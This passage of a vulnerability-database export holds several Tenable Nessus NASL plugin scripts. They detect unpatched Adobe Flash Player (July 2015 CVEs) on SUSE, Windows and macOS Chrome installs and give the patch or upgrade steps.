value:\"https://www.suse.com/security/cve/CVE-2015-3129/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3130/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3131/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3132/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3133/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3134/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3135/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3136/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3137/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4428/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4429/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4430/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4431/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4432/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4433/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5116/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5117/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5118/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5119/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151211-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fcaa49e7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12 :\n\nzypper in -t patch SUSE-SLE-WE-12-2015-306=1\n\nSUSE Linux Enterprise Desktop 12 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2015-306=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLED12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED12\" && (! ereg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"flash-player-11.2.202.481-93.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.481-93.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:24:31", "bulletinFamily": "scanner", "description": "The remote Windows host is missing KB3065823. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that allows an attacker to guess the address for the Flash heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow arbitrary code execution. (CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist that allow information disclosure. (CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116)\n\n - A memory corruption issue exists due to improper validation of user-supplied input. An attacker can exploit this to execute arbitrary code. (CVE-2015-5124)", "modified": "2018-11-15T00:00:00", "id": "SMB_KB3065823.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84645", "published": "2015-07-09T00:00:00", "title": "MS KB3065823: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84645);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3097\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\",\n \"CVE-2015-5124\"\n );\n script_bugtraq_id(\n 75090,\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n script_xref(name:\"MSKB\", value:\"3065823\");\n\n script_name(english:\"MS KB3065823: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer\");\n script_summary(english:\"Checks the version of the ActiveX control.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing KB3065823. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. (CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2016/2755801\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/3065823/microsoft-security-advisory-update-for-vulnerabilities-in-adobe-flash\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Microsoft KB3065823.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init()\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n# <= 18.0.0.194\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n (\n iver[0] < 18 ||\n (\n iver[0] == 18 &&\n (\n (iver[1] == 0 && iver[2] == 0 && iver[3] <= 194)\n )\n )\n )\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 18.0.0.203' +\n '\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_verbosity > 0)\n {\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:24:33", "bulletinFamily": "scanner", "description": "The version of Google Chrome installed on the remote Mac OS X host is prior to 43.0.2357.132. It is, therefore, affected by multiple vulnerabilities in the bundled version of Adobe Flash :\n\n - An information disclosure vulnerability exists that allows an attacker to guess the address for the Flash heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow arbitrary code execution. (CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist that allow information disclosure. (CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116)\n\n - A memory corruption issue exists due to improper validation of user-supplied input. An attacker can exploit this to execute arbitrary code. (CVE-2015-5124)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "modified": "2018-07-14T00:00:00", "id": "MACOSX_GOOGLE_CHROME_43_0_2357_132.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84668", "published": "2015-07-10T00:00:00", "title": "Google Chrome < 43.0.2357.132 Multiple Vulnerabilities (Mac OS X)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84668);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3097\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\",\n \"CVE-2015-5124\"\n );\n script_bugtraq_id(\n 75090,\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n\n script_name(english:\"Google Chrome < 43.0.2357.132 Multiple Vulnerabilities (Mac OS X)\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\nprior to 43.0.2357.132. It is, therefore, affected by multiple\nvulnerabilities in the bundled version of Adobe Flash :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. (CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.ca/2015/07/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e87f6dbb\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 43.0.2357.132 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'43.0.2357.132', severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:24:33", "bulletinFamily": "scanner", "description": "The version of Google Chrome installed on the remote Windows host is prior to 43.0.2357.132. It is, therefore, affected by multiple vulnerabilities in the bundled version of Adobe Flash :\n\n - An information disclosure vulnerability exists that allows an attacker to guess the address for the Flash heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow arbitrary code execution. (CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist that allow information disclosure. (CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116)\n\n - A memory corruption issue exists due to improper validation of user-supplied input. An attacker can exploit this to execute arbitrary code. (CVE-2015-5124)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "modified": "2018-07-12T00:00:00", "id": "GOOGLE_CHROME_43_0_2357_132.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84667", "published": "2015-07-10T00:00:00", "title": "Google Chrome < 43.0.2357.132 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84667);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/07/12 19:01:16\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3097\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\",\n \"CVE-2015-5124\"\n );\n script_bugtraq_id(\n 75090,\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n\n script_name(english:\"Google Chrome < 43.0.2357.132 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 43.0.2357.132. It is, therefore, affected by multiple\nvulnerabilities in the bundled version of Adobe Flash :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. (CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.ca/2015/07/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e87f6dbb\");\n 